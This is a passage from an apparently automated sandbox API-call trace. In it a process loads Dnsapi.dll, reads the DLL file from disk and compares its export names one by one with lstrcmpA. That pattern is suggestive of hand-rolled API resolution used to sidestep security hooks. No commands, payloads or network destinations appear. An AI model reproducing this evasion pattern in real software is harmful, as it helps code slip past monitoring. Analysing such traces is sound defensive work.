lpString2="CertCompareCertificate") returned 1 [0167.982] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertCompareCertificateName") returned 0 [0167.982] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddCRLContextToStore") returned 1 [0167.982] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddCRLLinkToStore") returned 1 [0167.982] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddCTLContextToStore") returned 1 [0167.982] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddCTLLinkToStore") returned 1 [0167.982] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddCertificateContextToStore") returned 1 [0167.982] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddCertificateLinkToStore") returned 1 [0167.982] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddEncodedCRLToStore") returned 1 [0167.982] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddEncodedCTLToStore") returned 1 [0167.982] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddEncodedCertificateToStore") returned 1 [0167.982] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0167.982] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0167.982] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 1 [0167.982] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddRefServerOcspResponse") returned 1 [0167.982] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddRefServerOcspResponseContext") returned 1 [0167.982] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddSerializedElementToStore") returned 1 [0167.982] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddStoreToCollection") returned 1 [0167.983] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAlgIdToOID") returned 1 [0167.983] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertCloseServerOcspResponse") returned 1 [0168.009] GetProcessHeap () returned 0x450000 [0168.009] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x4105040 | out: hHeap=0x450000) returned 1 [0168.162] GetProcessHeap () returned 0x450000 [0168.162] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x10) returned 0x469360 [0168.163] LoadLibraryA (lpLibFileName="Dnsapi.dll") returned 0x7ffc5a8a0000 [0168.180] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0168.180] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0168.181] GetModuleFileNameA (in: hModule=0x7ffc5a8a0000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\SYSTEM32\\Dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll")) returned 0x1e [0168.181] CreateFileA (lpFileName="C:\\Windows\\SYSTEM32\\Dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0168.181] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0168.181] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0168.181] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=686984) returned 1 [0168.182] GetProcessHeap () returned 0x450000 [0168.182] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0xa7b88) returned 0x3a7d010 [0168.183] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0168.183] ReadFile (in: hFile=0x17c, lpBuffer=0x3a7d010, nNumberOfBytesToRead=0xa7b88, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x3a7d010*, lpNumberOfBytesRead=0x14f5a4*=0xa7b88, lpOverlapped=0x0) returned 1 [0168.375] CloseHandle (hObject=0x17c) returned 1 [0168.375] lstrcmpA (lpString1="AdaptiveTimeout_ClearInterfaceSpecificConfiguration", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 0 [0168.375] lstrcmpA (lpString1="AdaptiveTimeout_ResetAdaptiveTimeout", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0168.376] lstrcmpA (lpString1="AdaptiveTimeout_ResetAdaptiveTimeout", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 0 [0168.376] lstrcmpA (lpString1="AddRefQueryBlobEx", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0168.376] lstrcmpA (lpString1="AddRefQueryBlobEx", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0168.376] lstrcmpA (lpString1="AddRefQueryBlobEx", lpString2="AddRefQueryBlobEx") returned 0 [0168.376] lstrcmpA (lpString1="BreakRecordsIntoBlob", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0168.376] lstrcmpA (lpString1="BreakRecordsIntoBlob", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0168.376] lstrcmpA (lpString1="BreakRecordsIntoBlob", lpString2="AddRefQueryBlobEx") returned 1 [0168.376] lstrcmpA (lpString1="BreakRecordsIntoBlob", lpString2="BreakRecordsIntoBlob") returned 0 [0168.376] lstrcmpA (lpString1="Coalesce_UpdateNetVersion", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0168.376] lstrcmpA (lpString1="Coalesce_UpdateNetVersion", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0168.376] lstrcmpA (lpString1="Coalesce_UpdateNetVersion", lpString2="AddRefQueryBlobEx") returned 1 [0168.376] lstrcmpA (lpString1="Coalesce_UpdateNetVersion", lpString2="BreakRecordsIntoBlob") returned 1 [0168.376] lstrcmpA (lpString1="Coalesce_UpdateNetVersion", lpString2="Coalesce_UpdateNetVersion") returned 0 [0168.377] lstrcmpA (lpString1="CombineRecordsInBlob", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0168.377] lstrcmpA (lpString1="CombineRecordsInBlob", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0168.377] lstrcmpA (lpString1="CombineRecordsInBlob", lpString2="AddRefQueryBlobEx") returned 1 [0168.377] lstrcmpA (lpString1="CombineRecordsInBlob", lpString2="BreakRecordsIntoBlob") returned 1 [0168.377] lstrcmpA (lpString1="CombineRecordsInBlob", lpString2="Coalesce_UpdateNetVersion") returned 1 [0168.377] lstrcmpA (lpString1="CombineRecordsInBlob", lpString2="CombineRecordsInBlob") returned 0 [0168.377] lstrcmpA (lpString1="DeRefQueryBlobEx", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0168.377] lstrcmpA (lpString1="DeRefQueryBlobEx", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0168.377] lstrcmpA (lpString1="DeRefQueryBlobEx", lpString2="AddRefQueryBlobEx") returned 1 [0168.377] lstrcmpA (lpString1="DeRefQueryBlobEx", lpString2="BreakRecordsIntoBlob") returned 1 [0168.377] lstrcmpA (lpString1="DeRefQueryBlobEx", lpString2="Coalesce_UpdateNetVersion") returned 1 [0168.377] lstrcmpA (lpString1="DeRefQueryBlobEx", lpString2="CombineRecordsInBlob") returned 1 [0168.377] lstrcmpA (lpString1="DeRefQueryBlobEx", lpString2="DeRefQueryBlobEx") returned 0 [0168.377] lstrcmpA (lpString1="DelaySortDAServerlist", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0168.377] lstrcmpA (lpString1="DelaySortDAServerlist", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0168.377] lstrcmpA (lpString1="DelaySortDAServerlist", lpString2="AddRefQueryBlobEx") returned 1 [0168.377] lstrcmpA (lpString1="DelaySortDAServerlist", lpString2="BreakRecordsIntoBlob") returned 1 [0168.377] lstrcmpA (lpString1="DelaySortDAServerlist", lpString2="Coalesce_UpdateNetVersion") returned 1 [0168.377] lstrcmpA (lpString1="DelaySortDAServerlist", lpString2="CombineRecordsInBlob") returned 1 [0168.377] lstrcmpA (lpString1="DelaySortDAServerlist", lpString2="DeRefQueryBlobEx") returned -1 [0168.378] lstrcmpA (lpString1="DelaySortDAServerlist", lpString2="DelaySortDAServerlist") returned 0 [0168.378] lstrcmpA (lpString1="DnsAcquireContextHandle_A", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0168.378] lstrcmpA (lpString1="DnsAcquireContextHandle_A", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0168.378] lstrcmpA (lpString1="DnsAcquireContextHandle_A", lpString2="AddRefQueryBlobEx") returned 1 [0168.378] lstrcmpA (lpString1="DnsAcquireContextHandle_A", lpString2="BreakRecordsIntoBlob") returned 1 [0168.378] lstrcmpA (lpString1="DnsAcquireContextHandle_A", lpString2="Coalesce_UpdateNetVersion") returned 1 [0168.378] lstrcmpA (lpString1="DnsAcquireContextHandle_A", lpString2="CombineRecordsInBlob") returned 1 [0168.378] lstrcmpA (lpString1="DnsAcquireContextHandle_A", lpString2="DeRefQueryBlobEx") returned 1 [0168.378] lstrcmpA (lpString1="DnsAcquireContextHandle_A", lpString2="DelaySortDAServerlist") returned 1 [0168.378] lstrcmpA (lpString1="DnsAcquireContextHandle_A", lpString2="DnsAcquireContextHandle_A") returned 0 [0168.378] lstrcmpA (lpString1="DnsAcquireContextHandle_W", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0168.378] lstrcmpA (lpString1="DnsAcquireContextHandle_W", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0168.378] lstrcmpA (lpString1="DnsAcquireContextHandle_W", lpString2="AddRefQueryBlobEx") returned 1 [0168.378] lstrcmpA (lpString1="DnsAcquireContextHandle_W", lpString2="BreakRecordsIntoBlob") returned 1 [0168.378] lstrcmpA (lpString1="DnsAcquireContextHandle_W", lpString2="Coalesce_UpdateNetVersion") returned 1 [0168.378] lstrcmpA (lpString1="DnsAcquireContextHandle_W", lpString2="CombineRecordsInBlob") returned 1 [0168.379] lstrcmpA (lpString1="DnsAcquireContextHandle_W", lpString2="DeRefQueryBlobEx") returned 1 [0168.379] lstrcmpA (lpString1="DnsAcquireContextHandle_W", lpString2="DelaySortDAServerlist") returned 1 [0168.379] lstrcmpA (lpString1="DnsAcquireContextHandle_W", lpString2="DnsAcquireContextHandle_A") returned 1 [0168.379] lstrcmpA (lpString1="DnsAcquireContextHandle_W", lpString2="DnsAcquireContextHandle_W") returned 0 [0168.379] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0168.379] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0168.379] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="AddRefQueryBlobEx") returned 1 [0168.379] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="BreakRecordsIntoBlob") returned 1 [0168.379] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="Coalesce_UpdateNetVersion") returned 1 [0168.379] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="CombineRecordsInBlob") returned 1 [0168.379] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="DeRefQueryBlobEx") returned 1 [0168.379] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="DelaySortDAServerlist") returned 1 [0168.379] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="DnsAcquireContextHandle_A") returned 1 [0168.379] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="DnsAcquireContextHandle_W") returned 1 [0168.379] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="DnsAllocateRecord") returned 0 [0168.379] lstrcmpA (lpString1="DnsApiAlloc", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0168.379] lstrcmpA (lpString1="DnsApiAlloc", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0168.379] lstrcmpA (lpString1="DnsApiAlloc", lpString2="AddRefQueryBlobEx") returned 1 [0168.379] lstrcmpA (lpString1="DnsApiAlloc", lpString2="BreakRecordsIntoBlob") returned 1 [0168.380] lstrcmpA (lpString1="DnsApiAlloc", lpString2="Coalesce_UpdateNetVersion") returned 1 [0168.380] lstrcmpA (lpString1="DnsApiAlloc", lpString2="CombineRecordsInBlob") returned 1 [0168.380] lstrcmpA (lpString1="DnsApiAlloc", lpString2="DeRefQueryBlobEx") returned 1 [0168.380] lstrcmpA (lpString1="DnsApiAlloc", lpString2="DelaySortDAServerlist") returned 1 [0168.380] lstrcmpA (lpString1="DnsApiAlloc", lpString2="DnsAcquireContextHandle_A") returned 1 [0168.380] lstrcmpA (lpString1="DnsApiAlloc", lpString2="DnsAcquireContextHandle_W") returned 1 [0168.380] lstrcmpA (lpString1="DnsApiAlloc", lpString2="DnsAllocateRecord") returned 1 [0168.380] lstrcmpA (lpString1="DnsApiAlloc", lpString2="DnsApiAlloc") returned 0 [0168.380] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0168.380] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0168.380] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="AddRefQueryBlobEx") returned 1 [0168.380] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="BreakRecordsIntoBlob") returned 1 [0168.380] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="Coalesce_UpdateNetVersion") returned 1 [0168.380] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="CombineRecordsInBlob") returned 1 [0168.380] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="DeRefQueryBlobEx") returned 1 [0168.380] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="DelaySortDAServerlist") returned 1 [0168.380] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="DnsAcquireContextHandle_A") returned 1 [0168.381] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="DnsAcquireContextHandle_W") returned 1 [0168.381] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="DnsAllocateRecord") returned 1 [0168.381] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="DnsApiAlloc") returned 1 [0168.381] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="DnsApiAllocZero") returned 0 [0168.381] lstrcmpA (lpString1="DnsApiFree", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0168.381] lstrcmpA (lpString1="DnsApiFree", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0168.381] lstrcmpA (lpString1="DnsApiFree", lpString2="AddRefQueryBlobEx") returned 1 [0168.381] lstrcmpA (lpString1="DnsApiFree", lpString2="BreakRecordsIntoBlob") returned 1 [0168.381] lstrcmpA (lpString1="DnsApiFree", lpString2="Coalesce_UpdateNetVersion") returned 1 [0168.381] lstrcmpA (lpString1="DnsApiFree", lpString2="CombineRecordsInBlob") returned 1 [0168.381] lstrcmpA (lpString1="DnsApiFree", lpString2="DeRefQueryBlobEx") returned 1 [0168.382] lstrcmpA (lpString1="DnsApiFree", lpString2="DelaySortDAServerlist") returned 1 [0168.382] lstrcmpA (lpString1="DnsApiFree", lpString2="DnsAcquireContextHandle_A") returned 1 [0168.382] lstrcmpA (lpString1="DnsApiFree", lpString2="DnsAcquireContextHandle_W") returned 1 [0168.382] lstrcmpA (lpString1="DnsApiFree", lpString2="DnsAllocateRecord") returned 1 [0168.382] lstrcmpA (lpString1="DnsApiFree", lpString2="DnsApiAlloc") returned 1 [0168.382] lstrcmpA (lpString1="DnsApiFree", lpString2="DnsApiAllocZero") returned 1 [0168.382] lstrcmpA (lpString1="DnsApiFree", lpString2="DnsApiFree") returned 0 [0168.382] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0168.382] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0168.382] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="AddRefQueryBlobEx") returned 1 [0168.382] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="BreakRecordsIntoBlob") returned 1 [0168.382] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="Coalesce_UpdateNetVersion") returned 1 [0168.382] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="CombineRecordsInBlob") returned 1 [0168.382] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="DeRefQueryBlobEx") returned 1 [0168.382] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="DelaySortDAServerlist") returned 1 [0168.382] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="DnsAcquireContextHandle_A") returned 1 [0168.382] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="DnsAcquireContextHandle_W") returned 1 [0168.382] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="DnsAllocateRecord") returned 1 [0168.382] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="DnsApiAlloc") returned 1 [0168.382] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="DnsApiAllocZero") returned 1 [0168.382] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="DnsApiFree") returned 1 [0168.382] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="DnsApiHeapReset") returned 0 [0168.382] lstrcmpA (lpString1="DnsApiRealloc", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0168.382] lstrcmpA (lpString1="DnsApiRealloc", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0168.383] lstrcmpA (lpString1="DnsApiRealloc", lpString2="AddRefQueryBlobEx") returned 1 [0168.383] lstrcmpA (lpString1="DnsApiRealloc", lpString2="BreakRecordsIntoBlob") returned 1 [0168.383] lstrcmpA (lpString1="DnsApiRealloc", lpString2="Coalesce_UpdateNetVersion") returned 1 [0168.383] lstrcmpA (lpString1="DnsApiRealloc", lpString2="CombineRecordsInBlob") returned 1 [0168.383] lstrcmpA (lpString1="DnsApiRealloc", lpString2="DeRefQueryBlobEx") returned 1 [0168.383] lstrcmpA (lpString1="DnsApiRealloc", lpString2="DelaySortDAServerlist") returned 1 [0168.383] lstrcmpA (lpString1="DnsApiRealloc", lpString2="DnsAcquireContextHandle_A") returned 1 [0168.383] lstrcmpA (lpString1="DnsApiRealloc", lpString2="DnsAcquireContextHandle_W") returned 1 [0168.383] lstrcmpA (lpString1="DnsApiRealloc", lpString2="DnsAllocateRecord") returned 1 [0168.383] lstrcmpA (lpString1="DnsApiRealloc", lpString2="DnsApiAlloc") returned 1 [0168.383] lstrcmpA (lpString1="DnsApiRealloc", lpString2="DnsApiAllocZero") returned 1 [0168.383] lstrcmpA (lpString1="DnsApiRealloc", lpString2="DnsApiFree") returned 1 [0168.383] lstrcmpA (lpString1="DnsApiRealloc", lpString2="DnsApiHeapReset") returned 1 [0168.383] lstrcmpA (lpString1="DnsApiRealloc", lpString2="DnsApiRealloc") returned 0 [0168.383] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0168.383] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0168.383] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="AddRefQueryBlobEx") returned 1 [0168.383] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="BreakRecordsIntoBlob") returned 1 [0168.383] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="Coalesce_UpdateNetVersion") returned 1 [0168.383] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="CombineRecordsInBlob") returned 1 [0168.383] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DeRefQueryBlobEx") returned 1 [0168.383] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DelaySortDAServerlist") returned 1 [0168.383] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DnsAcquireContextHandle_A") returned 1 [0168.383] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DnsAcquireContextHandle_W") returned 1 [0168.383] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DnsAllocateRecord") returned 1 [0168.383] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DnsApiAlloc") returned 1 [0168.383] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DnsApiAllocZero") returned 1 [0168.384] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DnsApiFree") returned 1 [0168.384] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DnsApiHeapReset") returned 1 [0168.384] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DnsApiRealloc") returned 1 [0168.384] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DnsApiSetDebugGlobals") returned 0 [0168.384] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0168.384] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0168.384] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="AddRefQueryBlobEx") returned 1 [0168.384] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="BreakRecordsIntoBlob") returned 1 [0168.384] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="Coalesce_UpdateNetVersion") returned 1 [0168.384] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="CombineRecordsInBlob") returned 1 [0168.384] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DeRefQueryBlobEx") returned 1 [0168.384] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DelaySortDAServerlist") returned 1 [0168.384] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DnsAcquireContextHandle_A") returned 1 [0168.384] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DnsAcquireContextHandle_W") returned 1 [0168.384] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DnsAllocateRecord") returned 1 [0168.384] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DnsApiAlloc") returned 1 [0168.384] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DnsApiAllocZero") returned 1 [0168.384] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DnsApiFree") returned 1 [0168.384] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DnsApiHeapReset") returned 1 [0168.384] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DnsApiRealloc") returned 1 [0168.384] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DnsApiSetDebugGlobals") returned 1 [0168.384] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DnsAsyncRegisterHostAddrs") returned 0 [0168.384] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0168.384] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0168.384] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="AddRefQueryBlobEx") returned 1 [0168.385] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="BreakRecordsIntoBlob") returned 1 [0168.385] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="Coalesce_UpdateNetVersion") returned 1 [0168.385] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="CombineRecordsInBlob") returned 1 [0168.385] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DeRefQueryBlobEx") returned 1 [0168.385] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DelaySortDAServerlist") returned 1 [0168.385] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsAcquireContextHandle_A") returned 1 [0168.385] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsAcquireContextHandle_W") returned 1 [0168.385] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsAllocateRecord") returned 1 [0168.385] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsApiAlloc") returned 1 [0168.385] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsApiAllocZero") returned 1 [0168.385] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsApiFree") returned 1 [0168.385] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsApiHeapReset") returned 1 [0168.385] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsApiRealloc") returned 1 [0168.385] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsApiSetDebugGlobals") returned 1 [0168.385] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsAsyncRegisterHostAddrs") returned 1 [0168.385] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsAsyncRegisterInit") returned 0 [0168.385] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0168.385] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0168.385] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="AddRefQueryBlobEx") returned 1 [0168.385] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="BreakRecordsIntoBlob") returned 1 [0168.385] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="Coalesce_UpdateNetVersion") returned 1 [0168.385] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="CombineRecordsInBlob") returned 1 [0168.385] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DeRefQueryBlobEx") returned 1 [0168.385] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DelaySortDAServerlist") returned 1 [0168.385] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsAcquireContextHandle_A") returned 1 [0168.386] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsAcquireContextHandle_W") returned 1 [0168.386] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsAllocateRecord") returned 1 [0168.386] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsApiAlloc") returned 1 [0168.386] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsApiAllocZero") returned 1 [0168.386] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsApiFree") returned 1 [0168.386] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsApiHeapReset") returned 1 [0168.386] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsApiRealloc") returned 1 [0168.386] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsApiSetDebugGlobals") returned 1 [0168.386] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsAsyncRegisterHostAddrs") returned 1 [0168.386] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsAsyncRegisterInit") returned 1 [0168.386] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsAsyncRegisterTerm") returned 0 [0168.386] lstrcmpA (lpString1="DnsCancelQuery", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0168.386] lstrcmpA (lpString1="DnsCancelQuery", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0168.386] lstrcmpA (lpString1="DnsCancelQuery", lpString2="AddRefQueryBlobEx") returned 1 [0168.386] lstrcmpA (lpString1="DnsCancelQuery", lpString2="BreakRecordsIntoBlob") returned 1 [0168.386] lstrcmpA (lpString1="DnsCancelQuery", lpString2="Coalesce_UpdateNetVersion") returned 1 [0168.386] lstrcmpA (lpString1="DnsCancelQuery", lpString2="CombineRecordsInBlob") returned 1 [0168.386] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DeRefQueryBlobEx") returned 1 [0168.386] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DelaySortDAServerlist") returned 1 [0168.386] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsAcquireContextHandle_A") returned 1 [0168.386] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsAcquireContextHandle_W") returned 1 [0168.386] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsAllocateRecord") returned 1 [0168.386] lstrcmpA 